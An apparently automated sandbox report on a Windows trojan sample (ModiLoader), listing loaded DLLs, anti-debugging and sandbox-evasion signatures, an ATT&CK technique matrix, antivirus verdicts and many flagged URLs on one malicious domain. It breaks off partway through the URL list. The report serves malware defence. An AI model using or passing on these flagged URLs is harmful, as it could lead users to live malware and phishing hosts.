      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
      Source: 6BE4RDldhw.exeStatic file information: File size 1483264 > 1048576
      Source: Binary string: easinvoker.pdb source: 6BE4RDldhw.exe, 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: easinvoker.pdbGCTL source: 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2582071460.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 0.2.6BE4RDldhw.exe.2e70000.2.unpack, type: UNPACKEDPE
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E88954 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02E88954
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E9D2FC push 02E9D367h; ret 0_2_02E9D35F
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E763AE push 02E7640Bh; ret 0_2_02E76403
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E763B0 push 02E7640Bh; ret 0_2_02E76403
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E9C374 push 02E9C56Ah; ret 0_2_02E9C562
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7332C push eax; ret 0_2_02E73368
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E9D0AC push 02E9D125h; ret 0_2_02E9D11D
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E83073 push 02E830C1h; ret 0_2_02E830B9
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E83074 push 02E830C1h; ret 0_2_02E830B9
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E9D1F8 push 02E9D288h; ret 0_2_02E9D280
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E9D144 push 02E9D1ECh; ret 0_2_02E9D1E4
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8F104 push ecx; mov dword ptr [esp], edx0_2_02E8F109
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7678C push 02E767CEh; ret 0_2_02E767C6
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7678A push 02E767CEh; ret 0_2_02E767C6
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7D5A8 push 02E7D5D4h; ret 0_2_02E7D5CC
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E9C56C push 02E9C56Ah; ret 0_2_02E9C562
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7C574 push ecx; mov dword ptr [esp], edx0_2_02E7C579
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8AADC push 02E8AB14h; ret 0_2_02E8AB0C
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E88AD2 push 02E88B0Ch; ret 0_2_02E88B04
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E88AD4 push 02E88B0Ch; ret 0_2_02E88B04
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7CBEF push 02E7CD7Ah; ret 0_2_02E7CD72
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7CBF4 push 02E7CD7Ah; ret 0_2_02E7CD72
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E88874 push 02E888B6h; ret 0_2_02E888AE
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02EE4850 push eax; ret 0_2_02EE4920
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8694E push 02E869FBh; ret 0_2_02E869F3
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E86950 push 02E869FBh; ret 0_2_02E869F3
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E87914 push 02E87991h; ret 0_2_02E87989
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E85E84 push ecx; mov dword ptr [esp], edx0_2_02E85E86
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E82F68 push 02E82FDEh; ret 0_2_02E82FD6

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon306.png
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7676A IsIconic,0_2_02E7676A
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8AB18 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02E8AB18
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeMemory allocated: 2E70000 memory commit 480006144Jump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeMemory allocated: 2E71000 memory commit 480178176Jump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeMemory allocated: 2E9D000 memory commit 480002048Jump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeMemory allocated: 2E9E000 memory commit 480350208Jump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeMemory allocated: 2EF4000 memory commit 481017856Jump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeMemory allocated: 2FEE000 memory commit 480014336Jump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E75908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02E75908
      Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000084E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeAPI call chain: ExitProcess graph end nodegraph_0-33443

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8F740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02E8F740
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E88954 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02E88954
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02E75ACC
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: GetLocaleInfoA,0_2_02E7A7CC
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02E75BD8
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: GetLocaleInfoA,0_2_02E7A818
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E79214 GetLocalTime,0_2_02E79214
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E7B794 GetVersionExA,0_2_02E7B794
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Valid Accounts
      1
      Native API
      1
      Valid Accounts
      1
      Valid Accounts
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Access Token Manipulation
      1
      Valid Accounts
      LSASS Memory211
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Virtualization/Sandbox Evasion
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture113
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets1
      System Network Connections Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync24
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      6BE4RDldhw.exe66%ReversingLabsWin32.Trojan.ModiLoader
      6BE4RDldhw.exe68%VirustotalBrowse
      6BE4RDldhw.exe100%AviraTR/AD.Nekark.yroxx
      6BE4RDldhw.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      taksonsdfg.co.in12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi8100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaIb100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/05100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiDASYC100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaX100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiqr100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/9r6k100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/H100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/234567876543212P100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432121$100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza0u100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzaaq100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/yr100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza0u100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/1r100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzakb100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzaqb100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/)r100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgim100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzak100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgig3ok100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza100%Avira URL Cloudmalware
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi$100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-s100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/Qu100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/Qr100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi1Content-LengthAllowWarningViaUpgradeTransfer-100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/Ir100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/Ar100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi)r100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaCb100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza8100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza7100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/234567876543212a100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza-bRk100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzakb100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/4100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi4100%Avira URL Cloudphishing
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiP100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/iu100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiU3100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/234567876543212100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi$100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaWb100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza$100%Avira URL Cloudphishing
      https://taksonsdfg.co.in100%Avira URL Cloudphishing
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza#100%Avira URL Cloudmalware
      https://www.veeble.org/contact/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      taksonsdfg.co.in
      108.170.55.202
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgitrue
      • Avira URL Cloud: phishing
      unknown
      https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzatrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi86BE4RDldhw.exe, 00000000.00000003.1914742318.00000000008CC000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://taksonsdfg.co.in/056BE4RDldhw.exe, 00000000.00000003.1394882795.00000000008D4000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:6BE4RDldhw.exe, 00000000.00000003.1648113930.00000000008CE000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 